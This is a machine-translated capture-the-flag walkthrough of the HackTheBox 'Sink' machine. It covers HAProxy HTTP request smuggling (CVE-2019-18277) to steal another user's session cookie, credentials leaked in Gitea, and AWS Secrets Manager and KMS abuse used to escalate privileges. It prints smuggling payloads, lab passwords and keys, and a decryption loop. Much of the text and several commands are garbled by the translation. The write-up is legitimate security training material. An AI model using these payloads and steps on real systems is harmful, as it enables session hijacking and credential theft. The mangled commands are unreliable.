0x00 Topic introduction

The Sink isHackTheBoxThe last difficulty isinsanetheLinuxTarget aircraft. It took a long timeHackTheBoxFirst timeinsaneDifficult, or learned a lot of things, here to share with you.

[Data Acquisition]

The topic mainly involves the knowledge of:

HAProxy HTTP request smuggling (CVE-2019-18277) Git commit log AWS CLI Configure

0x01 Port Scan

├ ─# nmap-sc-SV-oa sink 10.07.02 (https://nmap.org) at 2021-07-06 00:00 CST NMAP Scan Report For 10.129.71.3 Host is up (latency). Not shown: 997 Closed ports PORT STATE SERVICE VERSION 22/ TCP open SSH OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; Protocol 2.0) | SSH - hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 3000/tcp open ppp? | fingerprint - strings: | GenericLines, Help: | HTTP / 1.1 400 Bad Request | the content-type: text/plain. Charset = utf-8 | Connection: close | Request | GetRequest: HTTP / 1.0 200 OK | | the content-type: text/HTML. charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=7d01b54d4b74326b; Path=/; HttpOnly | Set-Cookie: _csrf=fzBuPyYXciKNMjoU74_PH6UmsMU6MTYyNTUwMDg1NzUxOTkyOTA4OQ; Path=/; Expires=Tue, 06 Jul 2021 16:00:57 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Mon, 05 Jul 2021 16:00:57 GMT | HTTPOptions: HTTP / 1.0 404 Not Found | | the content-type: text/HTML. charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=5a24776cc4ce15ce; Path=/; HttpOnly | Set-Cookie: _csrf=Naj5fDxJz0wmhymfl7zrTjDvfrI6MTYyNTUwMDg2NDgyNDg1NDY3MQ; Path=/; Expires=Tue, 06 Jul 2021 16:01:04 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Mon, 05 Jul 2021 16:01:04 GMT | <! DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Page Not Found - Gitea: Git with a cup of tea </title> | <link rel="manifest" href="/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> |_ <meta Name = "description" content = "Gitea (Git with a c 5000 / TCP open HTTP Gunicorn 20.0.0 | _http - server - the header: Gunicorn / 20.0.0 | _http - title: Sink the conversationCopy the code

The main open ports are 3000 and 5000, 3000 for Gitea’s website and 5000 for Gunicorn’s website. The website of port 3000 requires login, but we do not have any login credentials, so we first look at the website of port 5000.

0x02 Port 5000 – Gunicorn

5000 port website can register account, first try to register user login capture packet look

See the captured packetresponseContains thehaproxyandgunicorn

After login, the page can post comments. Google found that there was a vulnerability in HAProxy HTTP Request (CVE-2019-18277). Privacy information in HTTP request sent by other users can be obtained through the special comment request constructed by HTTP request smuggling.

HAProxy HTTP request smuggling (CVE-2019-18277)

HAProxy has problems handling transfer-Encoding and Content-Length in the request header. If both transfer-Encoding and Content-Length are added to the request header, And when \x0b or \x0c is added to the chunked field of transfer-encoding, HAProxy mistakenly sends requests with Transfer-Encoding and Content-Length to the backend. At this point, because the back end parses the request as a transfer-encoding request, it terminates the current request after detecting something like 0\r\n\r\n.

Request sent to HAProxy:

POST/HTTP/1.1 Host: 127.0.0.1:1080 Content-Length: 6 Transfer-Encoding:[\x0b]chunked 0 XCopy the code

Requests sent to back-end processing:

POST/HTTP/1.1 Host: 127.0.0.1:1080 Content-Length: 6 Transfer-Encoding: chunked X-Forwarded-For: 172.21.0.1xCopy the code

The http-reuse always reuse is configured in the HAProxy configuration and Connection: keep-alive is configured in the header when the request is sent.

admin cookie steal

Using the vulnerability of the HAProxy HTTP request system above, if after the malicious request constructed by us, other users have also made a request, then we can through smuggling a malicious request, connect the information of other users’ request to the smuggled request and store it in the website. When we look at this data, we can get the privacy information from the user’s request.

We construct the request in repeater

POST /comment HTTP/1.1 Host: 10.129.71.3:5000 User-agent: Mozilla/5.0 (X11; Linux x86_64; The rv: 78.0) Gecko / 20100101 Firefox 78.0 / Accept: text/HTML, application/XHTML + XML, application/XML. Q = 0.9, image/webp, * / *; Q = 0.8 Accept - Language: en - US, en. Q =0.5 accept-encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 8 Origin: http://10.129.71.3:5000 Connection: keep alive - Referer: http://10.129.71.3:5000/home cookies: lang = en - US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw Upgrade-Insecure-Requests: 1 Transfer-Encoding: Cwo=chunked 5 MSG =test 0 POST /comment HTTP/1.1 Host: 10.129.71.3:5000 Cookie: lang= en-us; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw Content-Type: application/x-www-form-urlencoded Content-Length: 8 Connection: keep-alive msg=Copy the code

The latter part of POST request is our smuggled request, because we need to add \x0b in front of the chunked of transfer-encoding, we add Cwo= first, then shift+ CTRL + B (base64 decode) in burp. Alternatively, add [\x0b] directly to burp. After sending, we can see a new comment in the comment section, which contains the cookie of the user.

The Cookie Editor can be replaced with [[email protected]](mailto:[email protected]) permission.

Credentials

The Credentials are available in three parts in Notes:

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

Copy the code

0x03 Port 3000 – Gitea

It is found that the password root/FaH[@3l](https://github.com/3L “@3l “)>Z3})zzfQ3 can successfully log in to Gitea on port 3000:

Gitea is a Git-like code hosting platform. I took a look at several major Repositories and found some secret key information in Key Management

Found to be the usermarcusThe submittedsshThe private key

User -marcus

Copy the private key to the local PC and change the permission to 600. SSH attempts to connect to user Marcus are successful

Ls User. TXT is found in the current directory and the first flag is obtained

0x04 Privilege Escalation

According to Key Management, there are some AWS operations. Also in Log Management, marcus was found to delete key and secret of AWS related configuration

Follow along to find the code associated with the previously committed configuration

<?php
require 'vendor/autoload.php';

use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;

$client = new CloudWatchLogsClient([
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version' => 'latest'
]);
try {
$client->createLogGroup(array(
    'logGroupName' => 'Chef_Events',
));
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
try {
$client->createLogStream([
    'logGroupName' => 'Chef_Events',
    'logStreamName' => '20201120'
]);
}catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>

Copy the code

AWS CLI Configure

After googling AWS, key and secret, I found relevant introduction in the official guide. You can configure key and secret through AWS to access key privacy information. The official guidelines are as follows:

Docs.aws.amazon.com/cli/latest/…

Docs.aws.amazon.com/cli/latest/…

We also tried to follow the official instructions in the configuration, only need to modify the key and secret, region represents the region, directly set according to the official default:

marcus@sink:~$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]: json

Copy the code

AWS Secretsmanager

After the configuration is complete, you can use secretsManager to list the saved secrets

Aws - the endpoint url = "http://127.0.0.1:4566/" - secretsmanager list - secretsCopy the code

Then according to the list of secrets one by one query

Aws -- endpoint-URL ="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:xxxxxxx<name>"Copy the code

The following is obtained

username:[email protected] password:EALB=bcC=`a7f2#k username:[email protected] password:Welcome123! username:[email protected] password:R); \\)ShS99mZ~8jCopy the code

User-david

To view/etc/passwdand/homePath, discovery is presentdavidThe user can successfully switch the password todavidThe user

0x05 AWS Key Management

severs.enc

davidUser directory/home/david/Projects/Prod_DeploymentFound oneservers.encDocuments, obviously, need to be decrypted

Since the directory is related to the Gitea project, it is likely to be decrypted through AWS. After searching, AWS Key Management was found

Docs.aws.amazon.com/kms/latest/…

Docs.aws.amazon.com/kms/latest/…

list-keys

The David user is also used to configure according to the previous AWS. After configuration, list-keys can be used

Aws - the endpoint url = "http://127.0.0.1:4566/" - KMS list - keysCopy the code

decrypt

The bash script is as follows:

#! / binbash for KEY in $(aws - the endpoint url = "http://127.0.0.1:4566/" KMS list - keys | grep KeyId | awk - F \ '{print $4}')" Do aws --endpoint-url="http://127.0.0.1:4566/" KMS enable-key --key-id "${key}" aws -- endpoint-URL ="http://127.0.0.1:4566/" KMS decrypt --key-id "${key}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext" doneCopy the code

Get a string of base64 strings, recommend using CyberChef to decrypt, select your desired module directly drag, very convenient:

gchq.github.io/CyberChef/

After base64, the package needs to be unpacked by gunzip to obtain the final secret key:

name: admin pass: _uezduQ! EY5AHfe2Copy the code

done!

conclusion

In general, this target plane mainly involves the knowledge points of HTTP request smuggling, HAProxy HTTP request (CVE-2019-18277), Gitea information leakage, AWS CLI configuration, AWS Key Management and so on. If you haven’t done AWS before, you can familiarize yourself with this target. In addition, although HTTP request smuggling is more demanding, it is also a feasible attack method, which needs further study.